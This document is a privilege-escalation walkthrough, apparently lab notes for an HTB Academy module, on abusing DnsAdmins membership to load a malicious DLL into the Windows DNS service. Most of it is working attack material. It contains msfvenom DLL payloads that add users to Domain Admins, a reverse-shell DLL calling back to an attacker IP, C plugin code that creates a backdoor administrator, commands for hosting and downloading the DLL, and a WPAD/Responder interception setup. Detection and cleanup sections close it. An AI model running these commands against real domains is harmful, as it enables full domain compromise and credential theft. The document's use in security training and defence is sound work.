DnsAdmins group members have access to DNS information and can manipulate DNS service configuration. Since the Windows DNS service runs as NT AUTHORITY\SYSTEM, membership in this group can be leveraged for privilege escalation on Domain Controllers or dedicated DNS servers through custom DLL plugin injection.
# Key attack components:
- DNS management performed over RPC
- ServerLevelPluginDll registry key allows custom DLL loading
- Zero verification of DLL path or content
- DNS service restart loads the custom DLL as SYSTEM
- Full path specification required for successful exploitation- Generate malicious DLL (msfvenom or custom code)
- Host DLL on accessible network share or local path
- Configure ServerLevelPluginDll registry key via dnscmd
- Restart DNS service to trigger DLL loading
- Execute payload with SYSTEM privileges
- Clean up registry and restore service
# Verify group membership
Get-ADGroupMember -Identity DnsAdmins
# Expected output:
distinguishedName : CN=netadm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
name : netadm
objectClass : user
SamAccountName : netadm
SID : S-1-5-21-669053619-2741956077-1013132368-1109# Check current user groups
whoami /groups
# Look for:
INLANEFREIGHT\DnsAdmins Group S-1-5-21-669053619-2741956077-1013132368-1103# Generate user addition payload
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
# Expected output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Payload size: 313 bytes
Final size of dll file: 5120 bytes
Saved as: adduser.dll# Generate reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f dll -o revshell.dll
# Set up listener
nc -lnvp 443// Modified kdns.c for command execution
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
FILE * kdns_logfile;
if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
{
klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
fclose(kdns_logfile);
system("net user hacker P@ssw0rd /add && net localgroup administrators hacker /add");
}
return ERROR_SUCCESS;
}# Start Python HTTP server
python3 -m http.server 7777
# Expected access log:
10.129.43.9 - - [19/May/2021 19:22:46] "GET /adduser.dll HTTP/1.1" 200 -
### Download to Target
```powershell
# Download DLL to target system
wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"
# Alternative with Invoke-WebRequest
Invoke-WebRequest -Uri "http://10.10.15.152:1234/adduser.dll" -OutFile "C:\Users\netadm\Desktop\adduser.dll"# Host on SMB share accessible by Domain Controller machine account
copy adduser.dll \\fileserver\share\adduser.dll# Attempt DLL loading as normal user (should fail)
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
# Expected failure:
DNS Server failed to reset registry property.
Status = 5 (0x00000005)
Command failed: ERROR_ACCESS_DENIED# Configure custom DLL path (requires full path)
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
# Expected success:
Registry property serverlevelplugindll successfully reset.
Command completed successfully.# Use network share path
dnscmd.exe /config /serverlevelplugindll \\10.10.14.3\share\adduser.dll# Get current user SID
wmic useraccount where name="netadm" get sid
# Expected output:
SID
S-1-5-21-669053619-2741956077-1013132368-1109# Check DNS service permissions using SDDL
sc.exe sdshow DNS
# Look for RPWP permissions (SERVICE_START and SERVICE_STOP):
D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)# Stop DNS service
sc stop dns
# Expected output:
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)# Start DNS service (triggers DLL loading)
sc start dns
# Expected output:
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
PID : 6960# Check if user was added to Domain Admins
net group "Domain Admins" /dom
# Expected result:
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator netadm- Credentials:
netadm:HTB_@cademy_stdnt! - Access Method: RDP
- Objective: Leverage DnsAdmins membership to escalate privileges and retrieve flag
# Example target IP from HTB Academy
xfreerdp /v:10.129.43.42 /u:netadm /p:'HTB_@cademy_stdnt!'
# Expected output:
[16:18:25:879] [4321:4323] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr# Generate DLL to add netadm to Domain Admins
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
# Expected output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 313 bytes
Final size of dll file: 8704 bytes
Saved as: adduser.dll# Start Python HTTP server on Pwnbox
python3 -m http.server 7777
# Expected output:
Serving HTTP on 0.0.0.0 port 7777 (http://0.0.0.0:7777/) ...# From RDP session, open PowerShell
# Download adduser.dll using wget
wget "http://10.10.14.80:7777/adduser.dll" -outfile "adduser.dll"
# Verify download
ls
# Expected output:
Directory: C:\Users\netadm
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/19/2021 1:38 PM Videos
-a---- 10/3/2022 9:03 AM 8704 adduser.dll# Open Command Prompt from RDP session
# Load malicious DLL via dnscmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\adduser.dll
# Expected success message:
Registry property serverlevelplugindll successfully reset.
Command completed successfully.# Stop DNS service
sc stop dns
# Expected output:
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
# Start DNS service (triggers DLL execution)
sc start dns
# Expected output:
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 6460
FLAGS :# Check Domain Admins group membership
net group "Domain Admins" /dom
# Expected result (netadm should be added):
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator netadm
The command completed successfully.# Sign out from current RDP session to refresh permissions
# Reconnect with same credentials
xfreerdp /v:10.129.43.42 /u:netadm /p:'HTB_@cademy_stdnt!'
# This step is important to refresh the session with new Domain Admin privileges# Open Command Prompt with Domain Admin privileges
# Access the flag file
type C:\Users\Administrator\Desktop\DnsAdmins\flag.txt
# Submit the flag content to HTB Academy- ✅ DLL Generation: 8704 bytes adduser.dll created successfully
- ✅ HTTP Server: Python server serving on port 7777
- ✅ DLL Download: adduser.dll present in C:\Users\netadm\
- ✅ Registry Configuration: "Registry property serverlevelplugindll successfully reset"
- ✅ DNS Service Restart: Both stop and start commands complete successfully
- ✅ Privilege Escalation: netadm appears in Domain Admins group
- ✅ Administrator Access: Can read files in C:\Users\Administrator\Desktop\DnsAdmins\
# Generate DLL for direct access
msfvenom -p windows/x64/exec cmd='copy c:\Users\Administrator\Desktop\DnsAdmins\flag.txt c:\Users\netadm\Desktop\flag.txt' -f dll -o getflag.dll# Generate DLL to enable RDP for netadm
msfvenom -p windows/x64/exec cmd='net localgroup "Remote Desktop Users" netadm /add' -f dll -o rdp.dll# WARNING: This is a destructive attack
- Only perform with explicit client permission
- DNS service disruption affects entire domain
- Always have cleanup plan ready
- Document all changes made# Check if ServerLevelPluginDll key exists
reg query \\[DC_IP]\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
# Look for:
ServerLevelPluginDll REG_SZ adduser.dll# Delete the malicious registry entry
reg delete \\[DC_IP]\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
# Confirm deletion:
Delete the registry value ServerLevelPluginDll (Yes/No)? Y
The operation completed successfully.# Restart DNS service cleanly
sc.exe start dns
# Verify service is running
sc query dns
# Expected output:
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING# Test DNS resolution
nslookup localhost
nslookup domain.com
# Verify DNS is working correctly# Disable global query block list
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local# Add WPAD record pointing to attack machine
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3# Set up Responder for traffic capture
responder -I eth0 -A
# Alternative: Use Inveigh
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y# Monitor for registry changes:
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll
# Event IDs to watch:
Event ID 4657 - Registry value modified
Event ID 4656 - Handle to object requested# Suspicious activities:
- DNS service stops/starts outside maintenance windows
- dnscmd.exe execution by non-administrative users
- Custom DLL files in DNS-related directories
- Network connections from DNS service process# Traffic patterns:
- HTTP requests for DLL files from Domain Controllers
- SMB connections to unusual shares
- DNS queries to non-standard records (WPAD)# Regular audits:
- Review DnsAdmins group membership quarterly
- Remove unnecessary accounts
- Implement least-privilege principles
- Use dedicated DNS management accounts# Security measures:
- Enable DNS audit logging
- Monitor ServerLevelPluginDll registry key
- Implement application whitelisting
- Restrict DNS service permissions# Deploy monitoring for:
- DnsAdmins group modifications
- dnscmd.exe execution
- DNS service restart events
- Custom DLL loading by DNS service- DnsAdmins membership verified
- DNS service permissions confirmed (RPWP)
- Domain Controller access available
- Client permission obtained for destructive testing
- Malicious DLL created (msfvenom or custom)
- Payload tested in lab environment
- Hosting method prepared (HTTP/SMB)
- Full path available for DLL specification
- Registry key configured (
dnscmd /config /serverlevelplugindll) - DNS service stopped (
sc stop dns) - DNS service started (
sc start dns) - Privilege escalation verified (group membership/access)
- Administrator access confirmed
- Flag file accessed (
c:\Users\Administrator\Desktop\DnsAdmins\flag.txt) - Flag content extracted and submitted
- Registry key removed (ServerLevelPluginDll)
- DNS service restored (clean restart)
- DNS functionality verified (nslookup tests)
- Changes documented for client reporting
- DnsAdmins membership enables SYSTEM-level code execution on DNS servers
- Custom DLL injection through ServerLevelPluginDll registry key
- DNS service restart required to trigger malicious DLL loading
- Full path specification mandatory for successful exploitation
- Destructive nature requires careful coordination with client
- Domain Controller impact - DNS disruption affects entire domain
- Multiple attack vectors - user addition, reverse shells, WPAD attacks
- Cleanup essential - registry restoration and service stability
DnsAdmins group privilege escalation represents one of the most powerful Windows built-in group attacks, capable of achieving Domain Admin privileges through DNS service manipulation.